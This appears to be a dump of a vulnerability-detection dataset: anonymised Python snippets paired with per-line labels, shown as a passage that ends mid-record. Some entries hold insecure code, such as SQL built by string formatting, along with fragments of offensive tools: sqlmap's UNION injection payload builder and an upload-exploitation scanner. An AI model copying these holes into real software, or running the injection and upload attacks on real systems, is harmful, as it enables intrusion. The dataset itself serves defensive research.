lines
sequencelengths 1
444
| raw_lines
sequencelengths 1
444
| label
sequencelengths 1
444
| type
sequencelengths 1
444
|
---|---|---|---|
[
"def FUNC_2(self, VAR_0):...\n",
"for s in VAR_0:\n",
"self.oms_ssh.characterReceived(s, False)\n"
] | [
"def _input(self, string):...\n",
"for s in string:\n",
"self.oms_ssh.characterReceived(s, False)\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"For",
"Expr'"
] |
[
"def FUNC_4(VAR_3):...\n",
"\"\"\"docstring\"\"\"\n",
"if not VAR_3.headers.get('Authorization'):\n",
"return None\n",
"if not utils.is_local_dev_server():\n",
"return api.extract_oauth_caller_identity()\n",
"VAR_32 = VAR_3.headers['Authorization'].split(' ', 1)\n",
"if len(VAR_32) != 2 or VAR_32[0] not in ('OAuth', 'Bearer'):\n",
"VAR_33 = 'https://www.googleapis.com/oauth2/v1/tokeninfo'\n",
"VAR_34 = urlfetch.fetch(url='%s?%s' % (base_url, urllib.urlencode({\n 'access_token': header[1]})), follow_redirects=False,\n validate_certificate=True)\n",
"if VAR_34.status_code != 200:\n",
"VAR_35 = json.loads(VAR_34.content)\n",
"VAR_22 = json.loads(VAR_34.content)['error_description']\n",
"VAR_22 = repr(VAR_34.content)\n",
"if 'email' not in VAR_35:\n",
"if not VAR_35.get('verified_email'):\n",
"VAR_36 = VAR_35['email']\n",
"return model.Identity(model.IDENTITY_USER, VAR_36)\n"
] | [
"def oauth_authentication(request):...\n",
"\"\"\"docstring\"\"\"\n",
"if not request.headers.get('Authorization'):\n",
"return None\n",
"if not utils.is_local_dev_server():\n",
"return api.extract_oauth_caller_identity()\n",
"header = request.headers['Authorization'].split(' ', 1)\n",
"if len(header) != 2 or header[0] not in ('OAuth', 'Bearer'):\n",
"base_url = 'https://www.googleapis.com/oauth2/v1/tokeninfo'\n",
"result = urlfetch.fetch(url='%s?%s' % (base_url, urllib.urlencode({\n 'access_token': header[1]})), follow_redirects=False,\n validate_certificate=True)\n",
"if result.status_code != 200:\n",
"token_info = json.loads(result.content)\n",
"error = json.loads(result.content)['error_description']\n",
"error = repr(result.content)\n",
"if 'email' not in token_info:\n",
"if not token_info.get('verified_email'):\n",
"email = token_info['email']\n",
"return model.Identity(model.IDENTITY_USER, email)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Condition",
"Return'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Condition",
"Assign'",
"Return'"
] |
[
"def FUNC_21(self, VAR_1):...\n",
"VAR_16 = [VAR_25.fieldname for VAR_25 in self.meta.get_table_fields() if \n VAR_25.options == VAR_1]\n",
"return VAR_16[0] if VAR_16 else None\n"
] | [
"def get_parentfield_of_doctype(self, doctype):...\n",
"fieldname = [df.fieldname for df in self.meta.get_table_fields() if df.\n options == doctype]\n",
"return fieldname[0] if fieldname else None\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_21(self):...\n",
"self.run_test_case(self.scenario.list_available_images())\n"
] | [
"def test_available_images(self):...\n",
"self.run_test_case(self.scenario.list_available_images())\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_1(VAR_4):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_6 = 'string' % (', '.join(VAR_1.keys()), VAR_4)\n",
"if not isinstance(VAR_4, (str, list)):\n",
"if VAR_4 != 'all' and not set(VAR_1.keys()).issuperset(VAR_4):\n",
"VAR_4 = list(VAR_1.keys()) if VAR_4 == 'all' else VAR_4[:]\n",
"return VAR_4\n"
] | [
"def check_leagues_ids(leagues_ids):...\n",
"\"\"\"docstring\"\"\"\n",
"leagues_ids_error_msg = (\n 'Parameter `leagues_ids` should be equal to `all` or a list that contains any of %s elements. Got %s instead.'\n % (', '.join(LEAGUES_MAPPING.keys()), leagues_ids))\n",
"if not isinstance(leagues_ids, (str, list)):\n",
"if leagues_ids != 'all' and not set(LEAGUES_MAPPING.keys()).issuperset(\n",
"leagues_ids = list(LEAGUES_MAPPING.keys()\n ) if leagues_ids == 'all' else leagues_ids[:]\n",
"return leagues_ids\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Condition",
"Condition",
"Assign'",
"Return'"
] |
[
"import json\n",
"import psycopg2\n",
"VAR_0 = \"INSERT INTO %s(data) VALUES('%s') RETURNING id\"\n",
"VAR_1 = 'SELECT %s FROM %s WHERE %s'\n",
"VAR_2 = 'SELECT * FROM %s WHERE id=%s'\n",
"def __init__(self, VAR_3, VAR_4):...\n",
"self.name = VAR_3\n",
"self.connection = VAR_4\n",
"self.cursor = self.connection.cursor()\n",
"def FUNC_0(self):...\n",
"self.connection.commit()\n",
"def FUNC_1(self, VAR_5):...\n",
"self.cursor.execute(self.SQL_INSERT_JSON % (self.name, json.dumps(VAR_5)))\n",
"return self.cursor.fetchone()[0]\n"
] | [
"import json\n",
"import psycopg2\n",
"SQL_INSERT_JSON = \"INSERT INTO %s(data) VALUES('%s') RETURNING id\"\n",
"SQL_QUERY_JSON = 'SELECT %s FROM %s WHERE %s'\n",
"SQL_GET_JSON = 'SELECT * FROM %s WHERE id=%s'\n",
"def __init__(self, name, connection):...\n",
"self.name = name\n",
"self.connection = connection\n",
"self.cursor = self.connection.cursor()\n",
"def commit(self):...\n",
"self.connection.commit()\n",
"def put(self, data):...\n",
"self.cursor.execute(self.SQL_INSERT_JSON % (self.name, json.dumps(data)))\n",
"return self.cursor.fetchone()[0]\n"
] | [
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4,
0
] | [
"Import'",
"Import'",
"Assign'",
"Assign'",
"Assign'",
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"Return'"
] |
[
"@classmethod...\n",
"return [FUNC_27, FUNC_28]\n"
] | [
"@classmethod...\n",
"return [not_applicable, applicable]\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"def FUNC_3(self, VAR_14):...\n",
"if not self.stopThreads:\n",
"VAR_13 = VAR_14.result()[0].text\n",
"return None\n",
"VAR_37 = VAR_14.ext[0]\n",
"VAR_28 = self.isASuccessfulUpload(VAR_13)\n",
"if VAR_28:\n",
"self.validExtensions.append(VAR_37)\n",
"return VAR_28\n",
"if self.shouldLog:\n",
"self.logger.info('\\x1b[1m\\x1b[42mExtension %s seems valid for this form.\\x1b[m'\n , VAR_37)\n",
"if VAR_28 != True:\n",
"self.logger.info(\n '\\x1b[1;32mTrue regex matched the following information : %s\\x1b[m', VAR_28\n )\n"
] | [
"def detectValidExtension(self, future):...\n",
"if not self.stopThreads:\n",
"html = future.result()[0].text\n",
"return None\n",
"ext = future.ext[0]\n",
"r = self.isASuccessfulUpload(html)\n",
"if r:\n",
"self.validExtensions.append(ext)\n",
"return r\n",
"if self.shouldLog:\n",
"self.logger.info('\\x1b[1m\\x1b[42mExtension %s seems valid for this form.\\x1b[m'\n , ext)\n",
"if r != True:\n",
"self.logger.info(\n '\\x1b[1;32mTrue regex matched the following information : %s\\x1b[m', r)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Return'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Return'",
"Condition",
"Expr'",
"Condition",
"Expr'"
] |
[
"\"\"\"string\"\"\"\n",
"from lib.core.agent import agent\n",
"from lib.core.data import conf\n",
"from lib.core.data import kb\n",
"from lib.core.data import logger\n",
"from lib.core.data import queries\n",
"from lib.core.session import setUnion\n",
"from lib.request.connect import Connect as Request\n",
"def FUNC_0(VAR_0, VAR_1):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_2 = {}\n",
"for count in range(0, 50):\n",
"if kb.dbms == 'Oracle' and VAR_0.endswith(' FROM DUAL'):\n",
"return None\n",
"VAR_0 = VAR_0[:-len(' FROM DUAL')]\n",
"if count:\n",
"VAR_0 += ', NULL'\n",
"if kb.dbms == 'Oracle':\n",
"VAR_0 += ' FROM DUAL'\n",
"VAR_5 = agent.postfixQuery(VAR_0, VAR_1)\n",
"VAR_6 = agent.payload(newValue=commentedQuery)\n",
"VAR_7 = Request.queryPage(VAR_6)\n",
"if not VAR_7 in VAR_2.keys():\n",
"VAR_2[VAR_7] = 1, VAR_5\n",
"VAR_2[VAR_7] = VAR_2[VAR_7][0] + 1, VAR_5\n",
"if count:\n",
"for element in VAR_2.values():\n",
"if element[0] == 1:\n",
"if kb.injPlace == 'GET':\n",
"VAR_4 = '%s?%s' % (conf.url, VAR_6)\n",
"if kb.injPlace == 'POST':\n",
"return VAR_4\n",
"VAR_4 = \"URL:\\t'%s'\" % conf.url\n",
"if kb.injPlace == 'Cookie':\n",
"VAR_4 += \"\\nPOST:\\t'%s'\\n\" % VAR_6\n",
"VAR_4 = \"URL:\\t'%s'\" % conf.url\n",
"if kb.injPlace == 'User-Agent':\n",
"VAR_4 += \"\\nCookie:\\t'%s'\\n\" % VAR_6\n",
"VAR_4 = \"URL:\\t\\t'%s'\" % conf.url\n",
"VAR_4 += \"\"\"\nUser-Agent:\t'%s'\n\"\"\" % VAR_6\n"
] | [
"\"\"\"\n$Id$\n\nThis file is part of the sqlmap project, http://sqlmap.sourceforge.net.\n\nCopyright (c) 2006-2008 Bernardo Damele A. G. <[email protected]>\n and Daniele Bellucci <[email protected]>\n\nsqlmap is free software; you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free\nSoftware Foundation version 2 of the License.\n\nsqlmap is distributed in the hope that it will be useful, but WITHOUT ANY\nWARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more\ndetails.\n\nYou should have received a copy of the GNU General Public License along\nwith sqlmap; if not, write to the Free Software Foundation, Inc., 51\nFranklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\"\"\"\n",
"from lib.core.agent import agent\n",
"from lib.core.data import conf\n",
"from lib.core.data import kb\n",
"from lib.core.data import logger\n",
"from lib.core.data import queries\n",
"from lib.core.session import setUnion\n",
"from lib.request.connect import Connect as Request\n",
"def __effectiveUnionTest(query, comment):...\n",
"\"\"\"docstring\"\"\"\n",
"resultDict = {}\n",
"for count in range(0, 50):\n",
"if kb.dbms == 'Oracle' and query.endswith(' FROM DUAL'):\n",
"return None\n",
"query = query[:-len(' FROM DUAL')]\n",
"if count:\n",
"query += ', NULL'\n",
"if kb.dbms == 'Oracle':\n",
"query += ' FROM DUAL'\n",
"commentedQuery = agent.postfixQuery(query, comment)\n",
"payload = agent.payload(newValue=commentedQuery)\n",
"newResult = Request.queryPage(payload)\n",
"if not newResult in resultDict.keys():\n",
"resultDict[newResult] = 1, commentedQuery\n",
"resultDict[newResult] = resultDict[newResult][0] + 1, commentedQuery\n",
"if count:\n",
"for element in resultDict.values():\n",
"if element[0] == 1:\n",
"if kb.injPlace == 'GET':\n",
"value = '%s?%s' % (conf.url, payload)\n",
"if kb.injPlace == 'POST':\n",
"return value\n",
"value = \"URL:\\t'%s'\" % conf.url\n",
"if kb.injPlace == 'Cookie':\n",
"value += \"\\nPOST:\\t'%s'\\n\" % payload\n",
"value = \"URL:\\t'%s'\" % conf.url\n",
"if kb.injPlace == 'User-Agent':\n",
"value += \"\\nCookie:\\t'%s'\\n\" % payload\n",
"value = \"URL:\\t\\t'%s'\" % conf.url\n",
"value += \"\"\"\nUser-Agent:\t'%s'\n\"\"\" % payload\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
2,
0,
0,
0,
0,
0,
2,
0,
0,
0,
0,
2,
2,
0,
2,
0,
0,
0,
0,
2,
0,
0,
2,
0,
2
] | [
"Expr'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Docstring",
"Assign'",
"For",
"Condition",
"Return'",
"Assign'",
"Condition",
"AugAssign'",
"Condition",
"AugAssign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"For",
"Condition",
"Condition",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Condition",
"AugAssign'",
"Assign'",
"Condition",
"AugAssign'",
"Assign'",
"AugAssign'"
] |
[
"def FUNC_7(self, VAR_9):...\n",
"for VAR_6 in self.clients:\n",
"if VAR_6 not in VAR_9:\n",
"self.close_client(VAR_6)\n"
] | [
"def update_client_status(self, active_set):...\n",
"for language in self.clients:\n",
"if language not in active_set:\n",
"self.close_client(language)\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"For",
"Condition",
"Expr'"
] |
[
"def FUNC_0():...\n",
"return BuildFileAliases(targets={PythonApp.alias(): PythonApp, PythonBinary\n .alias(): PythonBinary, PythonLibrary.alias(): PythonLibrary,\n PythonTests.alias(): PythonTests, PythonDistribution.alias():\n PythonDistribution, 'python_requirement_library':\n PythonRequirementLibrary, Resources.alias(): Resources, UnpackedWheels.\n alias(): UnpackedWheels}, objects={'python_requirement':\n PythonRequirement, 'python_artifact': PythonArtifact, 'setup_py':\n PythonArtifact}, context_aware_object_factories={'python_requirements':\n PythonRequirements, PantsRequirement.alias: PantsRequirement})\n"
] | [
"def build_file_aliases():...\n",
"return BuildFileAliases(targets={PythonApp.alias(): PythonApp, PythonBinary\n .alias(): PythonBinary, PythonLibrary.alias(): PythonLibrary,\n PythonTests.alias(): PythonTests, PythonDistribution.alias():\n PythonDistribution, 'python_requirement_library':\n PythonRequirementLibrary, Resources.alias(): Resources, UnpackedWheels.\n alias(): UnpackedWheels}, objects={'python_requirement':\n PythonRequirement, 'python_artifact': PythonArtifact, 'setup_py':\n PythonArtifact}, context_aware_object_factories={'python_requirements':\n PythonRequirements, PantsRequirement.alias: PantsRequirement})\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_6(self, VAR_29):...\n",
"if VAR_29 is None:\n",
"return VAR_101.user.pref_numsites\n",
"return VAR_54(VAR_55(int(VAR_29), 1), 250)\n"
] | [
"def run(self, limit):...\n",
"if limit is None:\n",
"return c.user.pref_numsites\n",
"return min(max(int(limit), 1), 250)\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"import hashlib\n",
"import inspect\n",
"import logging\n",
"import os\n",
"import re\n",
"import sys\n",
"import tempfile\n",
"import csv\n",
"import gzip\n",
"from datetime import datetime\n",
"from time import time\n",
"from io import StringIO\n",
"from sqlalchemy import event\n",
"from sqlalchemy.engine import Engine\n",
"from sqlalchemy.schema import DropTable\n",
"from sqlalchemy.ext.compiler import compiles\n",
"import pandas\n",
"import sqlalchemy\n",
"import lore\n",
"from lore.util import timer\n",
"from lore.stores import query_cached\n",
"VAR_0 = logging.getLogger(__name__)\n",
"@compiles(DropTable, 'postgresql')...\n",
"return VAR_2.visit_drop_table(VAR_1) + ' CASCADE'\n"
] | [
"import hashlib\n",
"import inspect\n",
"import logging\n",
"import os\n",
"import re\n",
"import sys\n",
"import tempfile\n",
"import csv\n",
"import gzip\n",
"from datetime import datetime\n",
"from time import time\n",
"from io import StringIO\n",
"from sqlalchemy import event\n",
"from sqlalchemy.engine import Engine\n",
"from sqlalchemy.schema import DropTable\n",
"from sqlalchemy.ext.compiler import compiles\n",
"import pandas\n",
"import sqlalchemy\n",
"import lore\n",
"from lore.util import timer\n",
"from lore.stores import query_cached\n",
"logger = logging.getLogger(__name__)\n",
"@compiles(DropTable, 'postgresql')...\n",
"return compiler.visit_drop_table(element) + ' CASCADE'\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"Assign'",
"Condition",
"Return'"
] |
[
"def FUNC_16(self, VAR_27, VAR_6, VAR_28):...\n",
"self.host_list.append(VAR_28)\n",
"self.logger.debug('Saving component to tmp')\n",
"VAR_48 = '%s/%s.yaml' % (VAR_2, VAR_6)\n",
"FUNC_10(VAR_48)\n",
"dump(VAR_27, outfile, default_flow_style=False)\n",
"self.logger.debug('Copying component \"%s\" to remote host \"%s\"' % (VAR_6,\n VAR_28))\n",
"VAR_12 = \"ssh %s 'mkdir -p %s' & scp %s %s:%s/%s.yaml\" % (VAR_28, VAR_1,\n VAR_48, VAR_28, VAR_1, VAR_6)\n",
"self.logger.debug(VAR_12)\n",
"FUNC_7(self.session, VAR_12)\n"
] | [
"def copy_component_to_remote(self, infile, comp, host):...\n",
"self.host_list.append(host)\n",
"self.logger.debug('Saving component to tmp')\n",
"tmp_comp_path = '%s/%s.yaml' % (TMP_COMP_DIR, comp)\n",
"ensure_dir(tmp_comp_path)\n",
"dump(infile, outfile, default_flow_style=False)\n",
"self.logger.debug('Copying component \"%s\" to remote host \"%s\"' % (comp, host))\n",
"cmd = \"ssh %s 'mkdir -p %s' & scp %s %s:%s/%s.yaml\" % (host, TMP_SLAVE_DIR,\n tmp_comp_path, host, TMP_SLAVE_DIR, comp)\n",
"self.logger.debug(cmd)\n",
"send_main_session_command(self.session, cmd)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_14(self, VAR_17, VAR_18, VAR_19, VAR_20):...\n",
"if VAR_18 == 'CP':\n",
"self.command(' '.join(['arm', 'mrc', str(self.targets[VAR_18]['registers'][\n VAR_17]['CP']), str(self.targets[VAR_18]['registers'][VAR_17]['Op1']),\n str(self.targets[VAR_18]['registers'][VAR_17]['CRn']), str(self.targets\n [VAR_18]['registers'][VAR_17]['CRm']), str(self.targets[VAR_18][\n 'registers'][VAR_17]['Op2']), VAR_20]), VAR_11=\n 'Error setting register value')\n",
"self.command('reg ' + VAR_17 + ' ' + VAR_20, VAR_11=\n 'Error setting register value')\n"
] | [
"def set_register_value(self, register, target, target_index, value):...\n",
"if target == 'CP':\n",
"self.command(' '.join(['arm', 'mrc', str(self.targets[target]['registers'][\n register]['CP']), str(self.targets[target]['registers'][register]['Op1'\n ]), str(self.targets[target]['registers'][register]['CRn']), str(self.\n targets[target]['registers'][register]['CRm']), str(self.targets[target\n ]['registers'][register]['Op2']), value]), error_message=\n 'Error setting register value')\n",
"self.command('reg ' + register + ' ' + value, error_message=\n 'Error setting register value')\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Expr'",
"Expr'"
] |
[
"def FUNC_14(self):...\n",
"return redirect(flask.url_for('goodbye'))\n"
] | [
"def redirect_to_goodbye(self):...\n",
"return redirect(flask.url_for('goodbye'))\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_0(VAR_6):...\n",
"if call(VAR_6['cmd'][1]['check'], shell=True) == 0:\n",
"return True\n",
"return False\n"
] | [
"def run_component_check(comp):...\n",
"if call(comp['cmd'][1]['check'], shell=True) == 0:\n",
"return True\n",
"return False\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"def FUNC_7(self):...\n",
"self.assert404(self.client.get(url_for('oauthclient.authorized', remote_app\n ='invalid')))\n",
"self.assert404(self.client.get(url_for('oauthclient.disconnect', remote_app\n ='invalid')))\n"
] | [
"def test_no_remote_app(self):...\n",
"self.assert404(self.client.get(url_for('oauthclient.authorized', remote_app\n ='invalid')))\n",
"self.assert404(self.client.get(url_for('oauthclient.disconnect', remote_app\n ='invalid')))\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'"
] |
[
"def FUNC_4(self):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_7 = logging.getLogger(__name__)\n",
"VAR_7.setLevel(logging.DEBUG)\n",
"VAR_7.debug('Started run funtion')\n",
"while not self.end:\n",
"VAR_10 = []\n",
"VAR_11 = []\n",
"VAR_12 = {}\n",
"while not self.job_queue.empty():\n",
"VAR_13 = self.job_queue.get()\n",
"VAR_11.extend(VAR_10)\n",
"if isinstance(VAR_13, CLASS_3):\n",
"for VAR_13 in VAR_11:\n",
"VAR_11.append(VAR_13)\n",
"if isinstance(VAR_13, CLASS_0) and VAR_13.comp_name not in VAR_12:\n",
"VAR_7.debug(VAR_13.info())\n",
"time.sleep(1)\n",
"VAR_10.append(VAR_13)\n",
"VAR_14 = VAR_13.run_check()\n",
"VAR_12[VAR_13.comp_name] = True\n",
"if VAR_14 is True:\n",
"VAR_7.debug(\"S'all good man\")\n",
"VAR_7.debug('Check failed, notifying subscribers')\n",
"self.job_queue.put(VAR_13)\n",
"for subscriber in self.subscribed_queues:\n",
"subscriber.put(VAR_14)\n"
] | [
"def run(self):...\n",
"\"\"\"docstring\"\"\"\n",
"logger = logging.getLogger(__name__)\n",
"logger.setLevel(logging.DEBUG)\n",
"logger.debug('Started run funtion')\n",
"while not self.end:\n",
"comp_jobs = []\n",
"jobs = []\n",
"already_handleled = {}\n",
"while not self.job_queue.empty():\n",
"mon_job = self.job_queue.get()\n",
"jobs.extend(comp_jobs)\n",
"if isinstance(mon_job, HostMonitorJob):\n",
"for mon_job in jobs:\n",
"jobs.append(mon_job)\n",
"if isinstance(mon_job, ComponentMonitorJob\n",
"logger.debug(mon_job.info())\n",
"time.sleep(1)\n",
"comp_jobs.append(mon_job)\n",
"ret = mon_job.run_check()\n",
"already_handleled[mon_job.comp_name] = True\n",
"if ret is True:\n",
"logger.debug(\"S'all good man\")\n",
"logger.debug('Check failed, notifying subscribers')\n",
"self.job_queue.put(mon_job)\n",
"for subscriber in self.subscribed_queues:\n",
"subscriber.put(ret)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Expr'",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Expr'",
"Condition",
"For",
"Expr'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"For",
"Expr'"
] |
[
"def FUNC_1(VAR_0, VAR_1):...\n",
""
] | [
"def render_recursive(request, depth):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"def FUNC_5(self, VAR_21):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_24 = self.getfile(VAR_21, VAR_23=False)\n",
"if VAR_24 is not False:\n",
"return True\n"
] | [
"def lexists(self, path):...\n",
"\"\"\"docstring\"\"\"\n",
"f = self.getfile(path, follow_symlinks=False)\n",
"if f is not False:\n",
"return True\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Condition",
"Return'"
] |
[
"import re\n",
"from flask import request\n",
"\"\"\"\n Stack data structure will not insert\n equal sequential data\n \"\"\"\n",
"def __init__(self, VAR_1=None, VAR_2=5):...\n",
"self.size = VAR_2\n",
"self.data = VAR_1 or []\n",
"def FUNC_5(self, VAR_3):...\n",
"if self.data:\n",
"if VAR_3 != self.data[len(self.data) - 1]:\n",
"self.data.append(VAR_3)\n",
"self.data.append(VAR_3)\n",
"if len(self.data) > self.size:\n",
"self.data.pop(0)\n",
"def FUNC_6(self):...\n",
"if len(self.data) == 0:\n",
"return None\n",
"return self.data.pop(len(self.data) - 1)\n"
] | [
"import re\n",
"from flask import request\n",
"\"\"\"\n Stack data structure will not insert\n equal sequential data\n \"\"\"\n",
"def __init__(self, list=None, size=5):...\n",
"self.size = size\n",
"self.data = list or []\n",
"def push(self, item):...\n",
"if self.data:\n",
"if item != self.data[len(self.data) - 1]:\n",
"self.data.append(item)\n",
"self.data.append(item)\n",
"if len(self.data) > self.size:\n",
"self.data.pop(0)\n",
"def pop(self):...\n",
"if len(self.data) == 0:\n",
"return None\n",
"return self.data.pop(len(self.data) - 1)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"ImportFrom'",
"Expr'",
"FunctionDef'",
"Assign'",
"Assign'",
"FunctionDef'",
"Condition",
"Condition",
"Expr'",
"Expr'",
"Condition",
"Expr'",
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"def __init__(self, VAR_18, VAR_35=10000, **VAR_16):...\n",
"CLASS_17.__init__(self, VAR_18, VAR_35=length, VAR_36=errors.NO_MSG_BODY, **kw)\n"
] | [
"def __init__(self, item, length=10000, **kw):...\n",
"VLength.__init__(self, item, length=length, empty_error=errors.NO_MSG_BODY,\n **kw)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_1(self, VAR_3):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_4 = '/api/keys'\n",
"VAR_5 = {'id': '[email protected]', 'public': VAR_3}\n",
"VAR_6 = self.client.post(VAR_4, json.dumps(VAR_5), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_6.status_code, 201)\n",
"VAR_7 = VAR_6.data['id']\n",
"VAR_6 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_6.status_code, 200)\n",
"self.assertEqual(len(VAR_6.data['results']), 1)\n",
"VAR_4 = '/api/keys/{key_id}'.format(**locals())\n",
"VAR_6 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_6.status_code, 200)\n",
"self.assertEqual(VAR_5['id'], VAR_6.data['id'])\n",
"self.assertEqual(VAR_5['public'], VAR_6.data['public'])\n",
"VAR_6 = self.client.delete(VAR_4)\n",
"self.assertEqual(VAR_6.status_code, 204)\n"
] | [
"def _check_key(self, pubkey):...\n",
"\"\"\"docstring\"\"\"\n",
"url = '/api/keys'\n",
"body = {'id': '[email protected]', 'public': pubkey}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"key_id = response.data['id']\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"url = '/api/keys/{key_id}'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(body['id'], response.data['id'])\n",
"self.assertEqual(body['public'], response.data['public'])\n",
"response = self.client.delete(url)\n",
"self.assertEqual(response.status_code, 204)\n"
] | [
0,
0,
0,
0,
5,
0,
0,
5,
0,
0,
0,
0,
0,
0,
0,
5,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'"
] |
[
"def FUNC_22(self, VAR_6):...\n",
"VAR_49 = self.nodes.get(VAR_6['name'])\n",
"VAR_50 = []\n",
"VAR_51 = []\n",
"dep_resolve(VAR_49, VAR_50, VAR_51)\n",
"VAR_50.remove(VAR_49)\n",
"return VAR_50\n"
] | [
"def get_dep_list(self, comp):...\n",
"node = self.nodes.get(comp['name'])\n",
"res = []\n",
"unres = []\n",
"dep_resolve(node, res, unres)\n",
"res.remove(node)\n",
"return res\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Return'"
] |
[
"def FUNC_15(self):...\n",
"VAR_12 = Client()\n",
"self.response = VAR_12.get(reverse('root-redirect'))\n",
"return self\n"
] | [
"def when_call_root_redirect(self):...\n",
"client = Client()\n",
"self.response = client.get(reverse('root-redirect'))\n",
"return self\n"
] | [
0,
0,
6,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_6(self, VAR_10, VAR_11, VAR_12=None, VAR_20=None):...\n",
"VAR_30 = self.uploadFile(VAR_10, VAR_11, VAR_12)\n",
"VAR_31 = self.isASuccessfulUpload(VAR_30[0].text)\n",
"VAR_23 = {'uploaded': False, 'codeExec': False}\n",
"if VAR_31:\n",
"VAR_23['uploaded'] = True\n",
"return VAR_23\n",
"if self.shouldLog:\n",
"self.logger.info(\"\\x1b[1;32mUpload of '%s' with mime type %s successful\\x1b[m\",\n VAR_30[1], VAR_11)\n",
"if VAR_31 != True:\n",
"if self.shouldLog:\n",
"if VAR_20 and valid_regex(VAR_20) and (self.uploadsFolder or self.trueRegex):\n",
"self.logger.info(\n '\\x1b[1;32m\\tTrue regex matched the following information : %s\\x1b[m',\n VAR_31)\n",
"VAR_18 = None\n",
"VAR_41 = None\n",
"if self.uploadsFolder:\n",
"VAR_18 = (self.schema + '://' + self.host + '/' + self.uploadsFolder + '/' +\n VAR_30[1])\n",
"if self.codeExecUrlPattern:\n",
"VAR_35 = VAR_30[1]\n",
"VAR_18 = self.codeExecUrlPattern.replace('$captGroup$', VAR_31)\n",
"if VAR_18:\n",
"VAR_41 = None\n",
"VAR_48 = self.detectCodeExec(VAR_18, VAR_20)\n",
"if VAR_41:\n",
"for b in getPoisoningBytes():\n",
